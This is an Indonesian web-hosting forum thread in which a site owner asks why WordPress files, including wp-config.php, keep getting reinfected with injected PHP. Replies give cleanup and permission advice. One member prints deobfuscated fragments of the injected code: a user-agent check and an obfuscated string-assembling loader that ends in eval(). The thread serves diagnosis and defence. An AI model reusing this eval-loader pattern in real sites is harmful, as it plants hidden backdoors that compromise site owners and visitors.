File Wordpress Di-Inject Malicious Code


Status
Not open for further replies.

Zhad

Poster 1.0
Hi Rekan-rekan DWH
Salah satu akun di DS saya, websitenya berbasis website, dan file-file pentingnya diinject kode aneh di awal baris kode file.
Plugin jadi ga kedetek dari dashboard.
Kode2 ini ada di php2 pilar wordpress kayak wp-config.php

Kodenya :



Sudah direstore ke normal
Update Salt, WP, Theme, Plugin
Kena2 lagi

Kenapa ya?

Trims
 

Zhad

Poster 1.0
Ini kode yang diinjek

<?php if(!isset($GLOBALS["\x61\156\x75\156\x61"])) { $ua=strtolower($_SERVER[ ....
 

Attachments

  • kode-aneh.txt
    12.9 KB · Views: 15

BikinDesainSitus

Hosting Guru
Verified Provider
saran saya.
  1. export tulisan dan page via dashbord
  2. copy / download file image di wp-content (Pastikan benar2 file image)
  3. hapus seluruh file
  4. install ulang
  5. install plugin itthemes security (dengan segala settingnya)
  6. import hasila export tadi
  7. upload file image wp-content

done...

backup !!
 

dhyhost

Web Hosting Service
The Warrior
Verified Provider
wp-config, biar aman coba diganti aja permissionnya ke 440 atau 400
 

slepetan

Beginner 2.0
penasaran.. kira2 apa yang dilakukan script ini ya? :39:
Yang awal:
Code:
<?php
if (!isset($GLOBALS["anuna"])) {
    $ua = strtolower($_SERVER["HTTP_USER_AGENT"]);
    if ((!strstr($ua, "msie")) and (!strstr($ua, "rv:11"))) $GLOBALS["anuna"] = 1;
}
?>

yang akhir..
Code:
$gubpbmvvqg = substr($rbzjgsiwbp, (45484 - 35378), (32 - 25));
if (!function_exists('hlzppruxlh')) {
    function hlzppruxlh($qvwxxucpoi, $jmqimpctxe) {
        $lbtiwvkexa = NULL;
        for ($xsnvcjahjp = 0;$xsnvcjahjp < (sizeof($qvwxxucpoi) / 2);$xsnvcjahjp++) {
            $lbtiwvkexa.= substr($jmqimpctxe, $qvwxxucpoi[($xsnvcjahjp * 2) ], $qvwxxucpoi[($xsnvcjahjp * 2) + 1]);
        }
        return $lbtiwvkexa;
    };
}
$fmdfhaflgb = " /* zsphxgrgor */ eval(str_replace(chr((153-116)), chr((517-425)), hlzppruxlh($hnoyopqjwg,$rbzjgsiwbp))); /* qdwduicxmi */ ";
$syumqqgzyd = substr($rbzjgsiwbp, (44524 - 34411), (64 - 52));
$syumqqgzyd($gubpbmvvqg, $fmdfhaflgb, NULL);
$syumqqgzyd = $fmdfhaflgb;
$syumqqgzyd = (525 - 404);
$rbzjgsiwbp = $syumqqgzyd - 1;
?>


Bagian tengah masih menjadi misteri.. :39:
 

Zhad

Poster 1.0
saran saya.
  1. export tulisan dan page via dashbord
  2. copy / download file image di wp-content (Pastikan benar2 file image)
  3. hapus seluruh file
  4. install ulang
  5. install plugin itthemes security (dengan segala settingnya)
  6. import hasila export tadi
  7. upload file image wp-content

done...

backup !!

File image itu seperti apa ya?
di wp-content juga pada kena inject


Hasilnya seperti ini pak -> http://www.diskusiwebhosting.com/threads/file-wordpress-di-inject-malicious-code.16820/#post-144429

Cuma ga ngarti itu kode ngapain

wp-config, biar aman coba diganti aja permissionnya ke 440 atau 400

Kalau file-file lain permissionnya berapa? Std kan 755
 

Zhad

Poster 1.0
@^ udah sih habis restore ulang, tapi kena lagi, uniknya last modified di cpanel, ga berubah, tapi filenya udah diinject kode2 tersebut
 
Status
Not open for further replies.

Top